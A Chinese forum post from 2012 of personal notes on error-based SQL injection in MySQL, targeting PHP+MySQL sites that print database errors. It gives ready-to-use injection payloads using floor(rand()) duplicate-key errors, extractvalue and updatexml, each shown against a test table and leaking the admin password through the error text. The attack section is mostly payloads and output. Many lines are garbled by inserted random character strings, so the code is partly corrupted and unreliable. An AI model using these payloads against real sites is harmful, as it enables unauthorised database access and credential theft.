放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
2 v8 q. A+ z6 N% j5 q7 f% S* ~: B4 C; y实际测试环境:
4 Z% P5 x# o, C
" s) O# Q' {4 Q
+ }8 p# L0 |& H* N1 z. ?+ pmysql> show tables;
! A* o. d% X+ A# _+----------------+
8 M( U& Y/ h4 [3 S2 _| Tables_in_test |
# H/ j$ v! {- P$ T+----------------+0 P' E9 `7 E& O# [
| admin |5 B6 k, {/ b( K8 e9 h! `% w
| article |: P. b/ H% I( m) [2 _
+----------------+9 a; e# B. m0 l; s1 t
% d! j5 n" \3 J2 q7 U) V. u
- Q+ N( x6 g+ n8 ?" \4 U. H) ?
4 x+ E6 R) y" `- P5 G
mysql> describe admin;- P# {4 T/ S" }- B) u
+-------+------------------+------+-----+---------+----------------+
v( b" Q) V* y: x( X4 u+ h" {| Field | Type | Null | Key | Default | Extra |( V( F' x/ a5 L: J0 M6 b
+-------+------------------+------+-----+---------+----------------+( @( u5 }( E" v+ R# ~
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
. @! a& i; e+ W7 || user | varchar(50) | NO | | NULL | |7 T4 y- S6 }0 S0 L. B
| pass | varchar(50) | NO | | NULL | |- G5 V# N" X% j( }
+-------+------------------+------+-----+---------+----------------+( t- Z% }8 K. p$ J4 J1 c2 [
" v/ o' x+ _5 J! a) r5 e
6 c: v1 G! H' X5 ?5 a7 w
, ?% y9 L& L0 `& p% W Bmysql> describe article;
/ K, ^1 d9 A7 A; Z" C+---------+------------------+------+-----+---------+----------------+
1 c4 t- G7 u2 H) Q# N| Field | Type | Null | Key | Default | Extra |
2 I$ ~3 g C. s& b$ ?8 W+---------+------------------+------+-----+---------+----------------+, f( z& X0 \; g y5 z4 { ~
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |9 X+ d' g* r1 w7 s, I
| title | varchar(50) | NO | | NULL | |) D7 x9 x5 W% `- `3 H* I' K ]7 N3 a
| content | varchar(50) | NO | | NULL | |
! P: G0 k8 @- |6 R- E2 u/ G+---------+------------------+------+-----+---------+----------------+
* z/ x' [/ t5 O: J' Z1 {" ?6 O1、通过floor报错' A. s& w/ r% u' Y8 Y; [ o; ?
可以通过如下一些利用代码
& o4 G% k4 a3 `0 l
+ k) X# ^& d& O5 p4 C8 F + V; P, U! n# Q$ q
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x+ j1 K7 L1 j& C' D) r& Q& e
from information_schema.tables group by x)a);
0 h9 ?; Z+ Z' Q+ }8 @* F/ w
( _( u. v( u; d: @4 G5 ~& H1 \
" R# R5 [+ J9 I* p0 P) Cand (select count(*) from (select 1 union select null union select !1)x% o9 v, x7 d a% G/ C
group by concat((select table_name from information_schema.tables limit 1),
8 |5 p) k& t1 w; [1 h8 S2 bfloor(rand(0)*2)));
5 a% V) p$ ?+ \6 ?$ E6 M( z# J* `2 @举例如下:
4 z& d/ ^( P2 g' q, @4 C首先进行正常查询:
/ {+ {* w6 J% n( X- A
Z9 H; x5 t2 R& m q v( K" H# Hmysql> select * from article where id = 1;4 Q4 }% J8 u# `9 V$ y4 h
+----+-------+---------+
& n$ K9 ]8 [# q2 ^| id | title | content |, m/ P: ?, p+ C- s) T2 B6 E
+----+-------+---------+0 C3 T, \2 e+ E; `
| 1 | test | do it |& V- X+ ]7 h! |. [- w: i2 E
+----+-------+---------+
! j4 e/ t' X0 `8 ?! m% ?假如id输入存在注入的话,可以通过如下语句进行报错。3 H4 W4 Q' J4 N+ p- Q: J7 Z) P$ U
4 O3 l6 W( G+ D ' J$ W$ v3 g( a* P
mysql> select * from article where id = 1 and (select 1 from# w+ e& i: x% y; t
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2 P' F. r6 c* T
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
# i9 c5 p4 b- l5 o; d$ a可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
% Q1 h9 F, F3 v }, h# N例如我们需要查询管理员用户名和密码:& D# t* C" ^/ m, K9 ]) W2 z
Method1:( t- C0 O: E3 X% U! E
' i' U( l$ J& a5 D, @
/ `, D8 o: s0 Y: |/ A5 ymysql> select * from article where id = 1 and (select 1 from, |+ I7 V4 b, M! w+ K6 E
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
( g% X, W+ f/ P1 k$ yfrom information_schema.tables group by x)a);: q# S) c( ~( Y4 \
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'* s: \# b e/ t _2 L1 q" J8 ?
Method2:. r, L, j% ?( A1 A. S# h) o5 b
# ~4 P9 `( o% c8 F$ f
' s5 L# w7 S4 Kmysql> select * from article where id = 1 and (select count(*)
7 L! R' L3 n. O" @6 O+ Gfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),0 g: N1 N$ n+ T- w1 D
floor(rand(0)*2)));
7 k5 A$ i$ T) q1 zERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
: }$ V% U. G& u$ i2、ExtractValue
5 i+ j; s( a4 S) ~: A" Q# A3 z5 Y测试语句如下
, u! l0 ]" z- W* y: H( b! }
$ Q+ ` F1 E- U; G
% l, y8 `* X3 G# ?and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));$ q+ _$ N+ d' C/ a/ J8 C
实际测试过程9 o' v2 \6 t3 z3 |, _: a, y* A
! R( e& n% h4 w& ~' ?
; n% D8 V! D, S4 [* `mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,9 |5 y. @/ z4 t: T- E7 k
(select pass from admin limit 1)));--: P" J$ A1 j4 h' J E
ERROR 1105 (HY000): XPATH syntax error: '\admin888'' x1 A5 W* R& P* t. y, W, f7 O
3、UpdateXml
5 |4 Y# k: V2 ^) O3 l( T# o测试语句
0 H. j n# K, Q3 C/ R6 V, {
8 `+ [/ K" x$ D3 k" \% u
; f ]. T, L0 P/ F6 ~and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
/ {5 c. K; K0 \0 o. `实际测试过程
" e4 F/ @8 _! u2 j" _ , u0 e% m2 x5 C( C( r7 u7 N6 P
6 i# A {; a4 i8 s
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,- S- O: z! z& O7 X+ P' f, e$ }4 Z0 w
(select pass from admin limit 1),0x5e24),1));8 W f8 d$ ?* [/ ?
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'2 I2 x; F4 \' s+ L8 S; p+ E2 t
All, thanks foreign guys.
' L6 W9 r$ l! a
5 x6 A5 o9 s: w# ]6 e6 m% `
& J. {5 I# h/ m$ O b8 D |
发表于 2012-12-10 10:28:51
收藏
支持
反对